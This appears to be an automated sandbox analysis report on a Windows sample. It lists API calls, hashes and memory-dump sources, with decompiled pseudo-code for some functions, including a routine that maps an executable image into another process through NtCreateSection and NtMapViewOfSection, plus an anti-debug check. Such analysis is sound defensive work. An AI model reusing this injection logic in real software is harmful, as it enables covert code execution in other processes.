                                                                                                                        • Opcode Fuzzy Hash: 1c6ec34be75abdd9849f1e6a5a3d158d07c0fbc19b670bdfa033a27e5f27ee90
                                                                                                                        • Instruction Fuzzy Hash: B9214F72A583916BE714DB64CD40F5B73EDBF84B14F144A1DB5A0C62D0D77AE804CB52
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332640, Relevance: 12.1, APIs: 8, Instructions: 98nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 89%
                                                                                                                        			E6F332640() {
				char _v8;
				void* _v16;
				long _v24;
				void* _v32;
				long _v44;
				void* _v48;
				void* _v56;
				void* _v64;
				long _v80;
				void* _v88;
				void* _v92;
				void* _v120;
				intOrPtr _v132;
				void* _v136;
				void* _v140;
				void* _t45;
				void* _t58;
				intOrPtr _t59;

				_t58 = "embly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD";
				_t1 = _t58 + 0x3c; // 0xf8
				_t59 =  *_t1;
				_t45 = 0;
				if( *((intOrPtr*)(_t59 + _t58)) == 0x4550) {
					_push(8);
					_push( &_v8);
					_v24 = 0;
					L6F33C2EE();
					_v16 =  *(_t59 + _t58 + 0x50);
					if(NtCreateSection( &_v32, 0xe, 0,  &_v16, 0x40, 0x8000000, 0) >= 0) {
						_v48 = 0;
						_v44 = 0;
						if(NtMapViewOfSection(_v56, 0xffffffff,  &_v48, 0, 0, 0,  &_v44, 2, 0, 0x40) >= 0) {
							_v88 = 0;
							if(NtMapViewOfSection(_v92, _v64,  &_v88, 0, 0, 0,  &_v80, 2, 0, 0x40) >= 0) {
								RtlMoveMemory(_v120, _t58,  *(_t59 + _t58 + 0x50));
								if(E6F3325B0(_v132, _v136) == 0) {
									NtUnmapViewOfSection(_v140, _v136);
								} else {
									_t45 = _v136;
								}
							}
							NtUnmapViewOfSection(0xffffffff, _v120);
						}
						NtClose(_v92);
					}
				}
				return _t45;
			}





















                                                                                                                        0x6f332646
                                                                                                                        0x6f33264c
                                                                                                                        0x6f33264c
                                                                                                                        0x6f33264f
                                                                                                                        0x6f332658
                                                                                                                        0x6f33265e
                                                                                                                        0x6f332664
                                                                                                                        0x6f332665
                                                                                                                        0x6f332669
                                                                                                                        0x6f332687
                                                                                                                        0x6f332692
                                                                                                                        0x6f3326b1
                                                                                                                        0x6f3326b5
                                                                                                                        0x6f3326c0
                                                                                                                        0x6f3326de
                                                                                                                        0x6f3326e9
                                                                                                                        0x6f3326f6
                                                                                                                        0x6f33270f
                                                                                                                        0x6f332721
                                                                                                                        0x6f332711
                                                                                                                        0x6f332711
                                                                                                                        0x6f332711
                                                                                                                        0x6f33270f
                                                                                                                        0x6f33272d
                                                                                                                        0x6f33272d
                                                                                                                        0x6f332737
                                                                                                                        0x6f332737
                                                                                                                        0x6f332692
                                                                                                                        0x6f332744

                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000008), ref: 6F332669
                                                                                                                        • NtCreateSection.NTDLL ref: 6F33268B
                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6F3326B9
                                                                                                                        • NtMapViewOfSection.NTDLL(08000000,00000000,0000000E,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6F3326E2
                                                                                                                        • RtlMoveMemory.NTDLL(?,6F330000,?), ref: 6F3326F6
                                                                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 6F332721
                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 6F33272D
                                                                                                                        • NtClose.NTDLL(?), ref: 6F332737
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Section$View$MemoryUnmap$CloseCreateMoveZero
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1304417992-0
                                                                                                                        • Opcode ID: 24aa4d2842e9f3f6c4d282406a3453828eb1ea6e8f1eba35bf3f88bb66c009d4
                                                                                                                        • Instruction ID: 354695f8e0d8794e2a2a7c850580af7fd883c47243ce42f0c314c4392ee4c867
                                                                                                                        • Opcode Fuzzy Hash: 24aa4d2842e9f3f6c4d282406a3453828eb1ea6e8f1eba35bf3f88bb66c009d4
                                                                                                                        • Instruction Fuzzy Hash: 6B3100B6608351BFE210DA94CDC0E6BB7ECFBC8658F404A1DF69596281D774ED048BB2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0050331C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00503323
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 005033A8
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                        • GetLastError.KERNEL32 ref: 0050342B
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00503443
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 0050344E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$FindH_prolog3$CloseEnterErrorExceptionException@8FileFirstH_prolog3_catchInitializeLastLeaveRaiseThrow
                                                                                                                        • String ID: PCK
                                                                                                                        • API String ID: 2655951058-2846323580
                                                                                                                        • Opcode ID: 74c174a8b0647d60cfd51adf62af6949e86be48be52c03c0e2441488bf28f24e
                                                                                                                        • Instruction ID: 83f8847adb6dfe63bae665bfaaf4613524d5f19933aea8dc096e1da97c4e7999
                                                                                                                        • Opcode Fuzzy Hash: 74c174a8b0647d60cfd51adf62af6949e86be48be52c03c0e2441488bf28f24e
                                                                                                                        • Instruction Fuzzy Hash: DF41B231900244EADB21EBB0CC59FDEBBB8BF21304F14465DF152A70E1DB74AA49C755
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3319F0, Relevance: 9.1, APIs: 6, Instructions: 143memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E6F3319F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				void* _v44;
				intOrPtr _v172;
				char _v356;
				long _v360;
				void* __edi;
				void* __esi;
				void* _t52;
				void* _t69;
				intOrPtr _t70;
				intOrPtr* _t83;
				signed int _t85;
				intOrPtr _t88;

				_t82 = _a4;
				_t69 = 0;
				if(_a4 != 0) {
					_t91 = _a8;
					_v44 = 0;
					_v24 = 0;
					_v16 = 0;
					_v20 = 0;
					_v4 = 0;
					_t88 = E6F331400( &_v356, _t82, _a8);
					if(_t88 != 0) {
						_t83 = _a16;
					} else {
						_t70 = _a12;
						_push( &_v356);
						_t88 = E6F3314E0(_t70);
						if(_t88 != 0) {
							_t83 = _a16;
						} else {
							_t88 = E6F3315C0( &_v356, _t82, _t91, _t70);
							if(_t88 != 0) {
								L18:
								_t83 = _a16;
								goto L19;
							} else {
								_t88 = E6F331660( &_v356);
								if(_t88 != 0) {
									goto L18;
								} else {
									_t88 = E6F331720( &_v356);
									if(_t88 != 0) {
										if(_v24 != 0) {
											_t85 = 0;
											if(_v20 > 0) {
												do {
													FreeLibrary( *(_v24 + _t85 * 4));
													_t85 = _t85 + 1;
												} while (_t85 < _v20);
											}
											HeapFree(GetProcessHeap(), 0, _v24);
										}
										goto L18;
									} else {
										_t88 = E6F3318D0( &_v356);
										if(_t88 != 0) {
											goto L18;
										} else {
											_t83 = _a16;
											if(_t83 != 0) {
												_v12 =  *((intOrPtr*)(_t83 + 0x2c));
												_v8 =  *((intOrPtr*)(_t83 + 0x30));
											}
											_t88 = E6F3319A0( &_v356, _t70);
											if(_t88 != 0) {
												L19:
												_push(0x8000);
												_push( &_v360);
												_push( &_v28);
												_push(0xffffffff);
												_v360 = 0;
												L6F33C2D6();
											} else {
												if(_t83 != 0) {
													 *((intOrPtr*)(_t83 + 0xc)) = _v32;
													 *((intOrPtr*)(_t83 + 0x10)) = _v28;
													 *((intOrPtr*)(_t83 + 0x14)) = _v4;
													 *((intOrPtr*)(_t83 + 4)) = 0x3c;
													 *((intOrPtr*)(_t83 + 8)) = _t70;
													 *((intOrPtr*)(_t83 + 0x18)) = _v172;
													 *(_t83 + 0x1c) = _v24;
													 *((intOrPtr*)(_t83 + 0x20)) = _v20;
												}
											}
										}
									}
								}
							}
						}
						_t52 = _v44;
						if(_t52 != 0) {
							HeapFree(GetProcessHeap(), 0, _t52);
						}
						_t69 = 0;
					}
					if(_t83 != _t69) {
						 *_t83 = _t88;
					}
					return _t88;
				} else {
					_t2 = _t69 - 2; // -2
					return _t2;
				}
			}























                                                                                                                        0x6f3319f8
                                                                                                                        0x6f3319ff
                                                                                                                        0x6f331a03
                                                                                                                        0x6f331a12
                                                                                                                        0x6f331a20
                                                                                                                        0x6f331a27
                                                                                                                        0x6f331a2e
                                                                                                                        0x6f331a35
                                                                                                                        0x6f331a3c
                                                                                                                        0x6f331a48
                                                                                                                        0x6f331a4f
                                                                                                                        0x6f331be0
                                                                                                                        0x6f331a55
                                                                                                                        0x6f331a55
                                                                                                                        0x6f331a60
                                                                                                                        0x6f331a68
                                                                                                                        0x6f331a6f
                                                                                                                        0x6f331bba
                                                                                                                        0x6f331a75
                                                                                                                        0x6f331a81
                                                                                                                        0x6f331a88
                                                                                                                        0x6f331b90
                                                                                                                        0x6f331b90
                                                                                                                        0x00000000
                                                                                                                        0x6f331a8e
                                                                                                                        0x6f331a96
                                                                                                                        0x6f331a9d
                                                                                                                        0x00000000
                                                                                                                        0x6f331aa3
                                                                                                                        0x6f331aa8
                                                                                                                        0x6f331aac
                                                                                                                        0x6f331b4f
                                                                                                                        0x6f331b51
                                                                                                                        0x6f331b5a
                                                                                                                        0x6f331b62
                                                                                                                        0x6f331b6d
                                                                                                                        0x6f331b6f
                                                                                                                        0x6f331b70
                                                                                                                        0x6f331b62
                                                                                                                        0x6f331b8a
                                                                                                                        0x6f331b8a
                                                                                                                        0x00000000
                                                                                                                        0x6f331ab2
                                                                                                                        0x6f331ab7
                                                                                                                        0x6f331abb
                                                                                                                        0x00000000
                                                                                                                        0x6f331ac1
                                                                                                                        0x6f331ac1
                                                                                                                        0x6f331aca
                                                                                                                        0x6f331ad2
                                                                                                                        0x6f331ad9
                                                                                                                        0x6f331ad9
                                                                                                                        0x6f331aea
                                                                                                                        0x6f331af1
                                                                                                                        0x6f331b97
                                                                                                                        0x6f331b97
                                                                                                                        0x6f331ba0
                                                                                                                        0x6f331ba8
                                                                                                                        0x6f331ba9
                                                                                                                        0x6f331bab
                                                                                                                        0x6f331bb3
                                                                                                                        0x6f331af7
                                                                                                                        0x6f331af9
                                                                                                                        0x6f331b14
                                                                                                                        0x6f331b1e
                                                                                                                        0x6f331b28
                                                                                                                        0x6f331b32
                                                                                                                        0x6f331b39
                                                                                                                        0x6f331b3c
                                                                                                                        0x6f331b3f
                                                                                                                        0x6f331b42
                                                                                                                        0x6f331b42
                                                                                                                        0x6f331af9
                                                                                                                        0x6f331af1
                                                                                                                        0x6f331abb
                                                                                                                        0x6f331aac
                                                                                                                        0x6f331a9d
                                                                                                                        0x6f331a88
                                                                                                                        0x6f331bc1
                                                                                                                        0x6f331bca
                                                                                                                        0x6f331bd6
                                                                                                                        0x6f331bd6
                                                                                                                        0x6f331bdc
                                                                                                                        0x6f331bdc
                                                                                                                        0x6f331be9
                                                                                                                        0x6f331beb
                                                                                                                        0x6f331beb
                                                                                                                        0x6f331bf9
                                                                                                                        0x6f331a06
                                                                                                                        0x6f331a06
                                                                                                                        0x6f331a10
                                                                                                                        0x6f331a10

                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F331BCF
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F331BD6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859560861-0
                                                                                                                        • Opcode ID: 047380f890eb2922787d5ec1697360bffd52bdff47e78a173ec9d8d4179a37bf
                                                                                                                        • Instruction ID: 9fb6415a86b195740a8fd1d14fe53390594b20f304f46608c5d4b538d76cb9c6
                                                                                                                        • Opcode Fuzzy Hash: 047380f890eb2922787d5ec1697360bffd52bdff47e78a173ec9d8d4179a37bf
                                                                                                                        • Instruction Fuzzy Hash: A6513E76D087A59BC330EF54D880ADBB7E9BF88354F014A2DDC8897340E736A845CB92
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004B9A29, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 198COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004B9A42
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 004B9A6F
                                                                                                                        • _malloc.LIBCMT ref: 004B9AD8
                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 004B9AF0
                                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,0044D1D9,00000000), ref: 004A1804
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$AdaptersInfoInitialize$Delete_malloc
                                                                                                                        • String ID: 2dw
                                                                                                                        • API String ID: 3929486883-3142033029
                                                                                                                        • Opcode ID: 999eba96ccd612d8cec666681854cb31328405d7509e45d4a784883a39de200f
                                                                                                                        • Instruction ID: 8396a63c6efd932a34edbd92c1a521cd1ff6eb308999f150f150de0feaf15261
                                                                                                                        • Opcode Fuzzy Hash: 999eba96ccd612d8cec666681854cb31328405d7509e45d4a784883a39de200f
                                                                                                                        • Instruction Fuzzy Hash: 5971F470404288AEDF24DF68C895AEE3BB4BF15314F24451FFA0697291DB38ED84CB69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00534A9B, Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 005451ED
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00545202
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(0075E8D4), ref: 0054520D
                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00545229
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00545230
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2579439406-0
                                                                                                                        • Opcode ID: 54291d387d8f923362384cd566d257d405ec737790e422d607dee19f889210b2
                                                                                                                        • Instruction ID: 63aae3b6df92d8d3c0fcbcda29cd1453f17e630902528dc46f969ab43ab429da
                                                                                                                        • Opcode Fuzzy Hash: 54291d387d8f923362384cd566d257d405ec737790e422d607dee19f889210b2
                                                                                                                        • Instruction Fuzzy Hash: 6021B2B4401204EFD759EF68FD496453BB4FB08305F58601BF50A96371E7B95984CF8A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F331C00, Relevance: 6.1, APIs: 4, Instructions: 69memorynativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 57%
                                                                                                                        			E6F331C00(intOrPtr _a4) {
				long _v4;
				intOrPtr* _t24;
				intOrPtr _t30;
				signed int _t37;
				intOrPtr _t39;
				void* _t40;

				_t39 = _a4;
				_t40 = 1;
				if(_t39 == 0 ||  *((intOrPtr*)(_t39 + 4)) != 0x3c ||  *((intOrPtr*)(_t39 + 0xc)) == 0) {
					L14:
					return 0;
				} else {
					_t30 = _t39 + 0x10;
					_a4 = _t30;
					if( *((intOrPtr*)(_t39 + 0x10)) == 0) {
						goto L14;
					} else {
						if( *(_t39 + 0x1c) != 0) {
							_t37 = 0;
							if( *((intOrPtr*)(_t39 + 0x20)) > 0) {
								do {
									FreeLibrary( *( *(_t39 + 0x1c) + _t37 * 4));
									_t37 = _t37 + 1;
								} while (_t37 <  *((intOrPtr*)(_t39 + 0x20)));
								_t30 = _a4;
							}
							HeapFree(GetProcessHeap(), 0,  *(_t39 + 0x1c));
						}
						if(( *(_t39 + 8) & 0x00000001) == 0) {
							_t24 =  *((intOrPtr*)(_t39 + 0x14));
							if(_t24 != 0) {
								_t40 =  *_t24( *((intOrPtr*)(_t39 + 0xc)), 0, 0);
							}
						}
						_push(0x8000);
						_push( &_v4);
						_push(_t30);
						_push(0xffffffff);
						_v4 = 0;
						L6F33C2D6();
						return _t40;
					}
				}
			}









                                                                                                                        0x6f331c04
                                                                                                                        0x6f331c08
                                                                                                                        0x6f331c0f
                                                                                                                        0x6f331cb3
                                                                                                                        0x6f331cb7
                                                                                                                        0x6f331c29
                                                                                                                        0x6f331c2d
                                                                                                                        0x6f331c30
                                                                                                                        0x6f331c34
                                                                                                                        0x00000000
                                                                                                                        0x6f331c36
                                                                                                                        0x6f331c3a
                                                                                                                        0x6f331c3d
                                                                                                                        0x6f331c42
                                                                                                                        0x6f331c50
                                                                                                                        0x6f331c57
                                                                                                                        0x6f331c59
                                                                                                                        0x6f331c5a
                                                                                                                        0x6f331c5f
                                                                                                                        0x6f331c5f
                                                                                                                        0x6f331c70
                                                                                                                        0x6f331c76
                                                                                                                        0x6f331c7b
                                                                                                                        0x6f331c7d
                                                                                                                        0x6f331c82
                                                                                                                        0x6f331c8e
                                                                                                                        0x6f331c8e
                                                                                                                        0x6f331c82
                                                                                                                        0x6f331c90
                                                                                                                        0x6f331c99
                                                                                                                        0x6f331c9a
                                                                                                                        0x6f331c9b
                                                                                                                        0x6f331c9d
                                                                                                                        0x6f331ca5
                                                                                                                        0x6f331cb0
                                                                                                                        0x6f331cb0
                                                                                                                        0x6f331c34

                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32 ref: 6F331C57
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F331C69
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F331C70
                                                                                                                        • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 6F331CA5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$Heap$LibraryMemoryProcessVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1020761401-0
                                                                                                                        • Opcode ID: 83e483c244fc649ca1f84219ff7223492add98395c5c5aace1c3365aea7dac1e
                                                                                                                        • Instruction ID: 8eb1d78d45fe5ace4bb96cd64242e8b3ef3c4ae36b17bb0efb469e661d709d61
                                                                                                                        • Opcode Fuzzy Hash: 83e483c244fc649ca1f84219ff7223492add98395c5c5aace1c3365aea7dac1e
                                                                                                                        • Instruction Fuzzy Hash: C221A2729447549FE730DF50D880B63B3E8FB88765F108A1EE49686680C771F848CB61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 006F605B, Relevance: 1.5, APIs: 1, Instructions: 13encryptionCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CryptReleaseContext.ADVAPI32(026A5B70,00000000), ref: 006F606B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
